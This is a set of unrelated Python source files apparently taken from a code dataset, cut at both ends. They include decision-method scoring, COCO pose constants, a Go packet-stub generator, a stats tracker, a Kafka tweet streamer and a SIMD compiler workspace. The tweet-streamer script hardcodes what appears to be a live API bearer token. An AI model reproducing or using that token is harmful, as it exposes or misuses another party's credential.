Criteria types. Profit criteria are represented by 1 and cost by -1.
bounds: ndarray
Bounds contain minimum and maximum values of each criterion. Minimum and maximum cannot be the same.
Returns
-------
ndrarray
Preference values of each alternative. The best alternative has the lowest preference value.
"""
SPOTIS._verify_input_data(matrix, weights, types)
return SPOTIS._spotis(matrix, weights, types, bounds)
@staticmethod
def _spotis(matrix, weights, types, bounds):
isp = np.zeros(matrix.shape[1])
#ideal solution point
isp[types == 1] = bounds[1, types == 1]
isp[types == -1] = bounds[0, types == -1]
norm_matrix = np.abs(matrix - isp) / np.abs(bounds[1, :] - bounds[0, :])
D = np.sum(weights * norm_matrix, axis = 1)
return D
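# Minimal usage sketch (hypothetical data; assumes the mcdm_method base class is importable):
#   matrix = np.array([[10.5, 42.0], [12.0, 38.0], [11.0, 45.0]])
#   weights = np.array([0.6, 0.4])        # must sum to 1
#   types = np.array([1, -1])             # profit criterion, cost criterion
#   bounds = np.array([[10.0, 35.0],      # row 0: criterion minima
#                      [13.0, 50.0]])     # row 1: criterion maxima
#   pref = SPOTIS()(matrix, weights, types, bounds)
#   best = np.argmin(pref)                # the lowest preference value wins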
|
import numpy as np
COCO_PERSON_SKELETON = [
(16, 14), (14, 12), (17, 15), (15, 13), (12, 13), (6, 12), (7, 13),
(6, 7), (6, 8), (7, 9), (8, 10), (9, 11), (2, 3), (1, 2), (1, 3),
(2, 4), (3, 5), (4, 6), (5, 7),
]
KINEMATIC_TREE_SKELETON = [
(1, 2), (2, 4), # left head
(1, 3), (3, 5),
(1, 6),
(6, 8), (8, 10), # left arm
(1, 7),
(7, 9), (9, 11), # right arm
(6, 12), (12, 14), (14, 16), # left side
(7, 13), (13, 15), (15, 17),
]
COCO_KEYPOINTS = [
'nose', # 1
'left_eye', # 2
'right_eye', # 3
'left_ear', # 4
'right_ear', # 5
'left_shoulder', # 6
'right_shoulder', # 7
'left_elbow', # 8
'right_elbow', # 9
'left_wrist', # 10
'right_wrist', # 11
'left_hip', # 12
'right_hip', # 13
'left_knee', # 14
'right_knee', # 15
'left_ankle', # 16
'right_ankle', # 17
]
COCO_UPRIGHT_POSE = np.array([
[0.0, 9.3, 2.0], # 'nose', # 1
[-0.35, 9.7, 2.0], # 'left_eye', # 2
[0.35, 9.7, 2.0], # 'right_eye', # 3
[-0.7, 9.5, 2.0], # 'left_ear', # 4
[0.7, 9.5, 2.0], # 'right_ear', # 5
[-1.4, 8.0, 2.0], # 'left_shoulder', # 6
[1.4, 8.0, 2.0], # 'right_shoulder', # 7
[-1.75, 6.0, 2.0], # 'left_elbow', # 8
[1.75, 6.2, 2.0], # 'right_elbow', # 9
[-1.75, 4.0, 2.0], # 'left_wrist', # 10
[1.75, 4.2, 2.0], # 'right_wrist', # 11
[-1.26, 4.0, 2.0], # 'left_hip', # 12
[1.26, 4.0, 2.0], # 'right_hip', # 13
[-1.4, 2.0, 2.0], # 'left_knee', # 14
[1.4, 2.1, 2.0], # 'right_knee', # 15
[-1.4, 0.0, 2.0], # 'left_ankle', # 16
[1.4, 0.1, 2.0], # 'right_ankle', # 17
])
COCO_DAVINCI_POSE = np.array([
[0.0, 9.3, 2.0], # 'nose', # 1
[-0.35, 9.7, 2.0], # 'left_eye', # 2
[0.35, 9.7, 2.0], # 'right_eye', # 3
[-0.7, 9.5, 2.0], # 'left_ear', # 4
[0.7, 9.5, 2.0], # 'right_ear', # 5
[-1.4, 8.0, 2.0], # 'left_shoulder', # 6
[1.4, 8.0, 2.0], # 'right_shoulder', # 7
[-3.3, 9.0, 2.0], # 'left_elbow', # 8
[3.3, 9.2, 2.0], # 'right_elbow', # 9
[-4.5, 10.5, 2.0], # 'left_wrist', # 10
[4.5, 10.7, 2.0], # 'right_wrist', # 11
[-1.26, 4.0, 2.0], # 'left_hip', # 12
[1.26, 4.0, 2.0], # 'right_hip', # 13
[-2.0, 2.0, 2.0], # 'left_knee', # 14
[2.0, 2.1, 2.0], # 'right_knee', # 15
[-2.4, 0.0, 2.0], # 'left_ankle', # 16
[2.4, 0.1, 2.0], # 'right_ankle', # 17
])
HFLIP = {
'left_eye': 'right_eye',
'right_eye': 'left_eye',
'left_ear': 'right_ear',
'right_ear': 'left_ear',
'left_shoulder': 'right_shoulder',
'right_shoulder': 'left_shoulder',
'left_elbow': 'right_elbow',
'right_elbow': 'left_elbow',
'left_wrist': 'right_wrist',
'right_wrist': 'left_wrist',
'left_hip': 'right_hip',
'right_hip': 'left_hip',
'left_knee': 'right_knee',
'right_knee': 'left_knee',
'left_ankle': 'right_ankle',
'right_ankle': 'left_ankle',
}
DENSER_COCO_PERSON_SKELETON = [
(1, 2), (1, 3), (2, 3), (1, 4), (1, 5), (4, 5),
(1, 6), (1, 7), (2, 6), (3, 7),
(2, 4), (3, 5), (4, 6), (5, 7), (6, 7),
(6, 12), (7, 13), (6, 13), (7, 12), (12, 13),
(6, 8), (7, 9), (8, 10), (9, 11), (6, 10), (7, 11),
(8, 9), (10, 11),
(10, 12), (11, 13),
(10, 14), (11, 15),
(14, 12), (15, 13), (12, 15), (13, 14),
(12, 16), (13, 17),
(16, 14), (17, 15), (14, 17), (15, 16),
(14, 15), (16, 17),
]
DENSER_COCO_PERSON_CONNECTIONS = [
c
for c in DENSER_COCO_PERSON_SKELETON
if c not in COCO_PERSON_SKELETON
]
COCO_PERSON_SIGMAS = [
0.026, # nose
0.025, # eyes
0.025, # eyes
0.035, # ears
0.035, # ears
0.079, # shoulders
0.079, # shoulders
0.072, # elbows
0.072, # elbows
0.062, # wrists
0.062, # wrists
0.107, # hips
0.107, # hips
0.087, # knees
0.087, # knees
0.089, # ankles
0.089, # ankles
]
COCO_PERSON_SCORE_WEIGHTS = [3.0] * 3 + [1.0] * (len(COCO_KEYPOINTS) - 3)
COCO_CATEGORIES = [
'person',
'bicycle',
'car',
'motorcycle',
'airplane',
'bus',
'train',
'truck',
'boat',
'traffic light',
'fire hydrant',
'street sign',
'stop sign',
'parking meter',
'bench',
'bird',
'cat',
'dog',
'horse',
'sheep',
'cow',
'elephant',
'bear',
'zebra',
'giraffe',
'hat',
'backpack',
'umbrella',
'shoe',
'eye glasses',
'handbag',
'tie',
'suitcase',
'frisbee',
'skis',
'snowboard',
'sports ball',
'kite',
'baseball bat',
'baseball glove',
'skateboard',
'surfboard',
'tennis racket',
'bottle',
'plate',
'wine glass',
'cup',
'fork',
'knife',
'spoon',
'bowl',
'banana',
'apple',
'sandwich',
'orange',
'broccoli',
'carrot',
'hot dog',
'pizza',
'donut',
'cake',
'chair',
'couch',
'potted plant',
'bed',
'mirror',
'dining table',
'window',
'desk',
'toilet',
'door',
'tv',
'laptop',
'mouse',
'remote',
'keyboard',
'cell phone',
'microwave',
'oven',
'toaster',
'sink',
'refrigerator',
'blender',
'book',
'clock',
'vase',
'scissors',
'teddy bear',
'hair drier',
'toothbrush',
'hair brush',
]
def draw_skeletons(pose):
import openpifpaf # pylint: disable=import-outside-toplevel
openpifpaf.show.KeypointPainter.show_joint_scales = True
keypoint_painter = openpifpaf.show.KeypointPainter()
scale = np.sqrt(
(np.max(pose[:, 0]) - np.min(pose[:, 0]))
* (np.max(pose[:, 1]) - np.min(pose[:, 1]))
)
ann = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=COCO_PERSON_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann, filename='docs/skeleton_coco.png') as ax:
keypoint_painter.annotation(ax, ann)
ann_kin = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=KINEMATIC_TREE_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann_kin.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann_kin, filename='docs/skeleton_kinematic_tree.png') as ax:
keypoint_painter.annotation(ax, ann_kin)
ann_dense = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=DENSER_COCO_PERSON_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann_dense.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann, ann_bg=ann_dense, filename='docs/skeleton_dense.png') as ax:
keypoint_painter.annotation(ax, ann_dense)
def print_associations():
for j1, j2 in COCO_PERSON_SKELETON:
print(COCO_KEYPOINTS[j1 - 1], '-', COCO_KEYPOINTS[j2 - 1])
if __name__ == '__main__':
print_associations()
# c, s = np.cos(np.radians(45)), np.sin(np.radians(45))
# rotate = np.array(((c, -s), (s, c)))
# rotated_pose = np.copy(COCO_DAVINCI_POSE)
# rotated_pose[:, :2] = np.einsum('ij,kj->ki', rotate, rotated_pose[:, :2])
draw_skeletons(COCO_UPRIGHT_POSE)
|
buf = """const LOGIN_PACKET = 0x8f;
const PLAY_STATUS_PACKET = 0x90;
const DISCONNECT_PACKET = 0x91;
const BATCH_PACKET = 0x92;
const TEXT_PACKET = 0x93;
const SET_TIME_PACKET = 0x94;
const START_GAME_PACKET = 0x95;
const ADD_PLAYER_PACKET = 0x96;
const REMOVE_PLAYER_PACKET = 0x97;
const ADD_ENTITY_PACKET = 0x98;
const REMOVE_ENTITY_PACKET = 0x99;
const ADD_ITEM_ENTITY_PACKET = 0x9a;
const TAKE_ITEM_ENTITY_PACKET = 0x9b;
const MOVE_ENTITY_PACKET = 0x9c;
const MOVE_PLAYER_PACKET = 0x9d;
const REMOVE_BLOCK_PACKET = 0x9e;
const UPDATE_BLOCK_PACKET = 0x9f;
const ADD_PAINTING_PACKET = 0xa0;
const EXPLODE_PACKET = 0xa1;
const LEVEL_EVENT_PACKET = 0xa2;
const TILE_EVENT_PACKET = 0xa3;
const ENTITY_EVENT_PACKET = 0xa4;
const MOB_EFFECT_PACKET = 0xa5;
const UPDATE_ATTRIBUTES_PACKET = 0xa6;
const MOB_EQUIPMENT_PACKET = 0xa7;
const MOB_ARMOR_EQUIPMENT_PACKET = 0xa8;
const INTERACT_PACKET = 0xa9;
const USE_ITEM_PACKET = 0xaa;
const PLAYER_ACTION_PACKET = 0xab;
const HURT_ARMOR_PACKET = 0xac;
const SET_ENTITY_DATA_PACKET = 0xad;
const SET_ENTITY_MOTION_PACKET = 0xae;
const SET_ENTITY_LINK_PACKET = 0xaf;
const SET_HEALTH_PACKET = 0xb0;
const SET_SPAWN_POSITION_PACKET = 0xb1;
const ANIMATE_PACKET = 0xb2;
const RESPAWN_PACKET = 0xb3;
const DROP_ITEM_PACKET = 0xb4;
const CONTAINER_OPEN_PACKET = 0xb5;
const CONTAINER_CLOSE_PACKET = 0xb6;
const CONTAINER_SET_SLOT_PACKET = 0xb7;
const CONTAINER_SET_DATA_PACKET = 0xb8;
const CONTAINER_SET_CONTENT_PACKET = 0xb9;
const CRAFTING_DATA_PACKET = 0xba;
const CRAFTING_EVENT_PACKET = 0xbb;
const ADVENTURE_SETTINGS_PACKET = 0xbc;
const TILE_ENTITY_DATA_PACKET = 0xbd;
//const PLAYER_INPUT_PACKET = 0xbe;
const FULL_CHUNK_DATA_PACKET = 0xbf;
const SET_DIFFICULTY_PACKET = 0xc0;
//const CHANGE_DIMENSION_PACKET = 0xc1;
//const SET_PLAYER_GAMETYPE_PACKET = 0xc2;
const PLAYER_LIST_PACKET = 0xc3;
//const TELEMETRY_EVENT_PACKET = 0xc4;"""
fbuf = """package mcpe
import "bytes"
//%s is a packet implements <TODO>
type %s struct {
*bytes.Buffer
fields map[string]interface{}
}
//Encode encodes the packet
func (pk %s) Encode() error {
return nil
}
//Decode decodes the packet
func (pk %s) Decode() error {
return nil
}
//GetField returns specified field
func (pk %s) GetField(string) interface{} {
return nil
}
//SetField sets specified field
func (pk %s) SetField(string) interface{} {
return nil
}
"""
print("const (")
ss = ""
for line in buf.split("\n"):
line = line.replace("const ", "").replace(" ", "")
line = line.replace("//", "").replace(";", "")
offset = line.find(" = ")
const = ''.join(s[0] + s[1:].lower() for s in line[:offset].split("_"))
line = const + "Head" + line[offset:]
print(" //%sHead is a header constant for %s\n "%(const, const) + line)
with open(const[:len(const) - 6].lower() + ".go", "w") as f:
f.write(fbuf % (const, const, const, const, const, const))
ss += " registerPacket(%sHead, *new(%s))\n" % (const, const)
print(")")
print(" ------------ ")
print(ss)
|
pass
#testing 11/12/19
#testing 7/19/20
|
#!/usr/bin/env python3
# Automate the following for floating point values:
# Checking that the values are within the specified range (ValueError)
# Track the minimum, maximum, and average values found
# Usage as a tracker, store value elsewhere:
# my_stats_tracker_variable_x = StatsTrackerBase.create_instance(min_bds, max_bds)
# my_stats_tracker_variable_x.set_value( ... ) for setting the value
# my_stats_tracker_variable_x.value for getting the value back
#
# See Code Design: Core functionality of simulator
# https://docs.google.com/document/d/1n8lx0HtgjiIuXMuVhB-bQtbvZuE114Cetnb8XVvn0yM/edit?usp=sharing
#
class StatsTrackerBase:
def __init__(self, allowable_min, allowable_max):
""" Dimension sizes will be found in allowable min/max - they should match
@param allowable_min - single number
@param allowable_max - single number"""
self.allowable_min = allowable_min
self.allowable_max = allowable_max
self.value = None
# Do it this way because we'll override in reset
self.min_found = None
self.max_found = None
self.avg_found = None
self.count = 0
# override reset for the different data types
self.reset()
def __str__(self):
return self.get_name() + \
" Min: {0:0.2f}".format(self.min_found) + \
" Max: {0:0.2f}".format(self.max_found) + \
" Avg: {0:0.2f}".format(self.avg_found) + \
" N: {}".format(self.count)
def __repr__(self):
return self.__str__()
def reset(self):
""" Reset for floats/arrays. Should probably be NaN, but avoids having to check for min/max being set
@param can optionally set the value"""
        if self.allowable_max < self.allowable_min:
            raise ValueError("{0} max less than min".format(self.get_name()))
self.min_found = self.allowable_max * 1e6
self.max_found = self.allowable_min * 1e-6
self.avg_found = self.allowable_min * 0.0
self.count = 0
self.value = None
def get_name(self):
""" This should be over-written by whatever class is inheriting from this one"""
return "{0}: ".format(self.__class__.__name__)
def set_value(self, val):
"""Wherever there's an equal/data, use this. It will check for allowable values and update the stats"""
if val < self.allowable_min:
raise ValueError("{0}, {1} less than min value {2}".format(self.get_name(), val, self.min_found))
if val > self.allowable_max:
raise ValueError("{0}, {1} greater than max value {2}".format(self.get_name(), val, self.max_found))
self.min_found = min(self.min_found, val)
self.max_found = max(self.max_found, val)
n = self.count+1
self.avg_found = self.avg_found * (self.count / n) + val * (1.0 / n)
self.count = n
self.value = val
@staticmethod
def create_instance(min_bds, max_bds, debug=True):
""" Create an instance based on the type (float/int or array)
TODO Be able to pass in the get_name method so you can name the variable
@param min_bds is either a number or an array
@param max_bds should match dimensionality of min_bds
        @returns An instance of StatsTrackerBase (floats/ints), StatsTrackerArray (list or numpy array), or StatsTrackerDoNothing (when debug=False)"""
if not debug:
return StatsTrackerDoNothing()
try:
return StatsTrackerBase(min_bds, max_bds)
except:
return StatsTrackerArray(min_bds, max_bds)
class StatsTrackerArray(StatsTrackerBase):
""" Overrides just the methods that need to do array accesses"""
def __init__(self, allowable_min, allowable_max):
""" Dimension sizes will be found in allowable min/max - they should match
@param allowable_min - array
@param allowable_max - array"""
# Will call reset() and set the _found variables to be the right size
super(StatsTrackerArray, self).__init__(allowable_min, allowable_max)
def __str__(self):
return self.get_name() + \
" Min: [" + ",".join(["{0:0.2f}".format(v) for v in self.min_found]) + "]" + \
" Max: [" + ",".join(["{0:0.2f}".format(v) for v in self.max_found]) + "]" + \
" Avg: [" + ",".join(["{0:0.2f}".format(v) for v in self.avg_found]) + "]" + \
" N: {}".format(self.count)
def reset(self):
""" Have to set all of the elements in the array - indirectly checks that the arrays are same size"""
for min_v, max_v in zip(self.allowable_min, self.allowable_max):
            if max_v < min_v:
                raise ValueError("{0} max less than min".format(self.get_name()))
self.min_found = [v * 1e6 for v in self.allowable_max]
self.max_found = [v * 1e-6 for v in self.allowable_min]
self.avg_found = [0 for _ in self.allowable_max]
self.count = 0
    def set_value(self, val):
        """Wherever there's an equal/data, use this. It will check for allowable values and update the stats"""
        n = self.count + 1
        for i, v in enumerate(val):
            if v < self.allowable_min[i]:
                raise ValueError("{0}, {1} less than min value {2}, index {3}".format(self.get_name(), val, self.min_found, i))
            if v > self.allowable_max[i]:
                raise ValueError("{0}, {1} greater than max value {2}, index {3}".format(self.get_name(), val, self.max_found, i))
            self.min_found[i] = min(self.min_found[i], v)
            self.max_found[i] = max(self.max_found[i], v)
            self.avg_found[i] = self.avg_found[i] * (self.count / n) + v * (1.0 / n)
        # one sample was added, however many elements it has
        self.count = n
        self.value = val
class StatsTrackerDoNothing(StatsTrackerBase):
def __init__(self, *args):
self.value = None
def reset(self):
pass
def __str__(self):
return self.get_name()
def set_value(self, val):
"""Just keep the value"""
self.value = val
if __name__ == "__main__":
my_test_float = StatsTrackerBase(3, 4)
my_test_array = StatsTrackerArray([3, 4, 5], [4, 10, 12])
print("{0}".format(my_test_float))
print("{0}".format(my_test_array))
|
# Imported required libraries
from tweepy import StreamingClient, StreamRule
from kafka import KafkaProducer
from jsons import dumps
#streamlit
# Creating reading class
class CustomInStream(StreamingClient):
def __init__(self, bearer_token, kafka_topic):
super(CustomInStream, self).__init__(bearer_token=bearer_token)
self.producer = KafkaProducer(bootstrap_servers=kafka_server, value_serializer=lambda m: dumps(m).encode('utf-8'))
self.kafka_topic = kafka_topic
def on_tweet(self, tweet):
# Please note that tweepy returns an object that needs to be serialized (i.e. converted to string)
# It must be encoded using utf-8 to handle non-ascii characters
print(tweet.id)
self.producer.send(self.kafka_topic, value=tweet)
#print(tweet.text)
#print(tweet.created_at)
#print(tweet.lang)
def recompile_rules(streaming_client):
# Getting Previous Rules ID's
prev_rules = streaming_client.get_rules()
rules_ids = []
for prev_rule in prev_rules[0]:
rules_ids.append(prev_rule.id)
# Deleting previous rules
streaming_client.delete_rules( ids=rules_ids )
# Creating filtering rules
ruleTag = "my-rule-1"
ruleValue = ""
ruleValue += "("
ruleValue += "covid"
ruleValue += " -is:retweet"
ruleValue += " -is:reply"
ruleValue += " -is:quote"
ruleValue += " -has:media"
ruleValue += " lang:en"
ruleValue += ")"
ruleValue += " OR ("
ruleValue += "covid"
ruleValue += " -is:retweet"
ruleValue += " -is:reply"
ruleValue += " -is:quote"
ruleValue += " -has:media"
ruleValue += " lang:fr"
ruleValue += ")"
# Adding new rules
rule1 = StreamRule(value=ruleValue, tag=ruleTag)
streaming_client.add_rules(rule1, dry_run=False)
######################################## BEGIN MAIN FUNCTION ########################################
# Tweepy Setup
bearer_token = "AAAAAAAAAAAAAAAAAAAAAORIaAEAAAAAl6GnXS7YGOeQdYa0uGwc8DMF40Q%3DLIM7DC8lSNbFmsVsgWYyJqYrl2iBCSsR3Z1uUqjJR8c2kONAG4"
reset_filtering_rules = False
# Kafka Configuration
kafka_server = ""
kafka_server += "localhost"
kafka_server += ":9092"
kafka_topic = "mes-tweets"
# Creating streaming client and authenticating using bearer token
streaming_client = CustomInStream(bearer_token=bearer_token, kafka_topic=kafka_topic)
# Recompiling client rules, if needed
if (reset_filtering_rules):
recompile_rules(streaming_client)
# Adding custom fields
tweet_fields = []
tweet_fields.append("created_at")
tweet_fields.append("lang")
expansions = []
expansions.append("referenced_tweets.id")
expansions.append("author_id")
# To test without rules or custom fields
# streaming_client.sample()
# Start reading
streaming_client.filter(tweet_fields=tweet_fields, expansions=expansions)
######################################## END MAIN FUNCTION ########################################
|
# file: tests/file_access_wrappers.py
# author: Andrew Jarcho
# date: 2017-01-22
# python: 3.5 pytest: 3.0.7
import io
class FileReadAccessWrapper:
def __init__(self, filename):
self.filename = filename
def open(self):
return open(self.filename, 'r')
class FakeFileReadWrapper:
def __init__(self, text):
self.text = text
self.start_ix = 0
def open(self):
return io.StringIO(self.text)
def input(self):
return self.open()
def __iter__(self): # TODO: not in use -- needs testing
return self
def __next__(self): # TODO: not in use -- needs testing
next_newline_ix = self.text.find('\n', self.start_ix)
if next_newline_ix == -1:
raise StopIteration
else:
ret_str = self.text[self.start_ix: next_newline_ix]
self.start_ix = next_newline_ix + 1
return ret_str
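# Usage sketch (hypothetical consumer): both wrappers expose .open(), so code under test
# can receive either one and tests can swap in the in-memory fake.
#   def count_lines(wrapper):
#       with wrapper.open() as f:
#           return sum(1 for _ in f)
#   count_lines(FileReadAccessWrapper('data.txt'))   # reads from disk
#   count_lines(FakeFileReadWrapper('a\nb\nc\n'))    # reads the fake text, returns 3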
|
"""
Xtract Blueprint
"""
from calm.dsl.builtins import ref, basic_cred
from calm.dsl.builtins import Service, Package, Substrate
from calm.dsl.builtins import Deployment, Profile, Blueprint
from calm.dsl.builtins import read_provider_spec, read_local_file
ADMIN_PASSWD = read_local_file("admin_passwd")
DefaultCred = basic_cred("admin", ADMIN_PASSWD, name="default cred", default=True)
class XtractVM(Service):
"""Xtract service"""
pass
class XtractPackage(Package):
"""Xtract package"""
services = [ref(XtractVM)]
class XtractVMS(Substrate):
"""Xtract Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
readiness_probe = {
"disabled": True,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(DefaultCred),
}
class XtractDeployment(Deployment):
"""Xtract Deployment"""
packages = [ref(XtractPackage)]
substrate = ref(XtractVMS)
class AHV(Profile):
"""Xtract Profile"""
deployments = [XtractDeployment]
class XtractDslBlueprint(Blueprint):
"""* [Xtract for VMs](https://@@{XtractVM.address}@@)"""
credentials = [DefaultCred]
services = [XtractVM]
packages = [XtractPackage]
substrates = [XtractVMS]
profiles = [AHV]
def main():
print(XtractDslBlueprint.json_dumps(pprint=True))
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os,sys
import re
import shutil
import pypsutils
import subprocess
import pyps
simd_h = "SIMD_types.h"
def gen_simd_zeros(code):
""" This function will match the pattern SIMD_ZERO*_* + SIMD_LOAD_*
and replaces it by the real corresponding SIMD_ZERO function. """
pattern=r'(SIMD_LOAD_V([4 8])SF\(vec(.*), &(RED[0-9]+)\[0\]\);)'
compiled_pattern = re.compile(pattern)
occurences = re.findall(compiled_pattern,code)
if occurences != []:
for item in occurences:
code = re.sub(item[3]+"\[[0-"+item[1]+"]\] = (.*);\n","",code)
code = re.sub(re.escape(item[0]),"SIMD_ZERO_V"+item[1]+"SF(vec"+item[2]+");",code)
return code
def autotile(m,verb):
''' Function that autotile a module's loops '''
#m.rice_all_dependence()
#m.internalize_parallel_code()
#m.nest_parallelization()
#m.internalize_parallel_code()
m.split_update_operator()
def tile_or_dive(m,loops):
kernels=list()
for l in loops:
if l.loops():
try:
l.simdizer_auto_tile()
kernels.append(l)
except:
kernels+=tile_or_dive(m,l.loops())
else:
kernels.append(l)
return kernels
kernels=tile_or_dive(m,m.loops())
m.partial_eval()
extram=list()
for l in kernels:
mn=m.name+"_"+l.label
m.outline(module_name=mn,label=l.label)
lm=m.workspace[mn]
extram.append(lm)
if lm.loops() and lm.loops()[0].loops():
lm.loop_nest_unswitching()
if verb:
lm.display()
lm.suppress_dead_code()
if verb:
lm.display()
lm.loop_normalize(one_increment=True,skip_index_side_effect=True)
lm.partial_eval()
lm.partial_eval()
lm.partial_eval()
lm.flatten_code()
if verb:
lm.display()
else:
lm.loops()[0].loop_auto_unroll()
if verb:
m.display()
extram.append(m)
return extram
class sacbase(object):
@staticmethod
def sac(module, **cond):
ws = module.workspace
if not cond.has_key("verbose"):
cond["verbose"] = ws.verbose
# Here are the transformations made by benchmark.tpips.h, blindy
# translated in pyps.
ws.activate("preconditions_intra")
ws.activate("transformers_intra_full")
ws.props.loop_unroll_with_prologue = False
ws.props.constant_path_effects = False
#ws.props.ricedg_statistics_all_arrays = True
ws.props.c89_code_generation = True
ws.props.simd_fortran_mem_organisation = False
ws.props.sac_simd_register_width = cond["register_width"]
ws.props.prettyprint_all_declarations = True
ws.props.compute_all_dependences = True
module.recover_for_loop()
module.for_loop_to_do_loop()
module.split_initializations()
module.forward_substitute()
if cond.get("verbose"):
module.display()
module.split_update_operator()
if cond.get("if_conversion", False):
if cond.get("verbose"):
module.display()
module.if_conversion_init()
module.if_conversion()
module.if_conversion_compact()
if cond.get("verbose"):
module.display()
ws.activate("MUST_REGIONS")
ws.activate("REGION_CHAINS")
ws.activate("RICE_REGIONS_DEPENDENCE_GRAPH")
ws.activate("PRECONDITIONS_INTER_FULL")
ws.activate("TRANSFORMERS_INTER_FULL")
# Perform auto-loop tiling
allm=autotile(module,cond.get("verbose"))
for module in allm:
module.partial_eval()
module.simd_remove_reductions()
if cond.get("verbose"):
module.display()
for p in ( "__PIPS_SAC_MULADD" , ):
module.expression_substitution(pattern=p)
module.simd_atomizer()
if cond.get("verbose"):
module.display()
module.scalar_renaming()
try:
module.simdizer(generate_data_transfers=True)
            except Exception,e:
                print >>sys.stderr, "Module %s simdizer exception: %s" % (module.name, str(e))
if cond.get("verbose"):
#module.print_dot_dependence_graph()
module.display()
module.redundant_load_store_elimination()
try:
module.delay_communications_intra()
module.flatten_code(unroll = False)
except RuntimeError: pass
module.redundant_load_store_elimination()
module.clean_declarations()
# In the end, uses the real SIMD_ZERO_* functions if necessary
# This would have been "perfect" (as much as perfect this
# method is...), but PIPS isn't aware of (a|v)4sf and
# other vector types...
#module.modify(gen_simd_zeros)
if cond.get("verbose"):
module.display()
class sacsse(sacbase):
register_width = 128
hfile = "sse.h"
makefile = "Makefile.sse"
ext = "sse"
@staticmethod
def sac(module, **kwargs):
kwargs["register_width"] = sacsse.register_width
sacbase.sac(module, **kwargs)
class sac3dnow(sacbase):
register_width = 64
hfile = "threednow.h"
makefile = "Makefile.3dn"
ext = "3dn"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sac3dnow.register_width
# 3dnow supports only floats
for line in module.code():
if re.search("double", line) or re.search(r"\b(cos|sin)\b", line):
raise RuntimeError("Can't vectorize double operations with 3DNow!")
sacbase.sac(module, *args, **kwargs)
class sacavx(sacbase):
register_width = 256
hfile = "avx.h"
makefile = "Makefile.avx"
ext = "avx"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sacavx.register_width
sacbase.sac(module, *args, **kwargs)
class sacneon(sacbase):
register_width = 128
hfile = "neon.h"
makefile = "Makefile.neon"
ext = "neon"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sacneon.register_width
sacbase.sac(module, *args, **kwargs)
class workspace(pyps.workspace):
"""The SAC subsystem, in Python.
Add a new transformation, for adapting code to SIMD instruction
sets (SSE, 3Dnow, AVX and ARM NEON)"""
patterns_h = "patterns.h"
patterns_c = "patterns.c"
simd_c = "SIMD.c"
def __init__(self, *sources, **kwargs):
drivers = {"sse": sacsse, "3dnow": sac3dnow, "avx": sacavx, "neon": sacneon}
self.driver = drivers[kwargs.get("driver", "sse")]
        #Warning: this patches every module, not only those of this workspace
pyps.module.sac=self.driver.sac
# Add -DRWBITS=self.driver.register_width to the cppflags of the workspace
kwargs['cppflags'] = kwargs.get('cppflags',"")+" -DRWBITS=%d " % (self.driver.register_width)
super(workspace,self).__init__(pypsutils.get_runtimefile(self.simd_c,"sac"), pypsutils.get_runtimefile(self.patterns_c,"sac"), *sources, **kwargs)
def save(self, rep=None):
"""Add $driver.h, which replaces general purpose SIMD instructions
with machine-specific ones."""
if rep == None:
rep = self.tmpdirname
(files,headers) = super(workspace,self).save(rep)
#run gen_simd_zeros on every file
for file in files:
with open(file, 'r') as f:
read_data = f.read()
read_data = gen_simd_zeros(read_data)
with open(file, 'w') as f:
f.write(read_data)
# Generate SIMD.h according to the register width
# thanks to gcc -E and cproto (ugly, need something
# better)
simd_h_fname = os.path.abspath(rep + "/SIMD.h")
simd_c_fname = os.path.abspath(rep + "/SIMD.c")
p = subprocess.Popen("gcc -DRWBITS=%d -E %s |cproto" % (self.driver.register_width, simd_c_fname), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(simd_cus_header,serr) = p.communicate()
if p.returncode != 0:
raise RuntimeError("Error while creating SIMD.h: command returned %d.\nstdout:\n%s\nstderr:\n%s\n" % (p.returncode, simd_cus_header, serr))
p = subprocess.Popen("gcc -DRWBITS=%d -E %s |cproto" % (self.driver.register_width, self.simd_c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(simdz_cus_header,serr) = p.communicate()
if p.returncode != 0:
raise RuntimeError("Error while creating SIMD.h: command returned %d.\nstdout:\n%s\nstderr:\n%s\n" % (p.returncode, simd_cus_header, serr))
pypsutils.string2file('#include "'+simd_h+'"\n'+simd_cus_header, simd_h_fname)
pypsutils.string2file(simd_h+"\n"+simdz_cus_header, simd_h_fname)
for fname in files:
if not fname.endswith("SIMD.c"):
pypsutils.addBeginnning(fname, '#include "'+simd_h+'"')
# Add the contents of patterns.h
for fname in files:
if not fname.endswith("patterns.c"):
pypsutils.addBeginnning(fname, '#include "'+self.patterns_h+'"\n')
# Add header to the save rep
shutil.copy(pypsutils.get_runtimefile(simd_h,"sac"),rep)
shutil.copy(pypsutils.get_runtimefile(self.patterns_h,"sac"),rep)
return files,headers+[os.path.join(rep,simd_h),os.path.join(rep,self.patterns_h)]
def get_sac_maker(self,Maker=pyps.Maker):
"""Calls sacMaker to return a maker class using the driver set in the workspace"""
return sacMaker(Maker,self.driver)
def sacMaker(Maker,driver):
"""Returns a maker class inheriting from the Maker class given in the arguments and using the driver given in the arguments"""
class C(Maker):
"""Maker class inheriting from Maker"""
def get_ext(self):
return "."+driver.ext+super(C,self).get_ext()
def get_makefile_info(self):
return [ ( "sac", driver.makefile ) ] + super(C,self).get_makefile_info()
def generate(self,path,sources,cppflags="",ldflags=""):
newsources = []
for fname in sources:
#change the includes
filestring = pypsutils.file2string(os.path.join(path,fname))
filestring= re.sub('#include "'+simd_h+'"','#include "'+driver.hfile+'"',filestring)
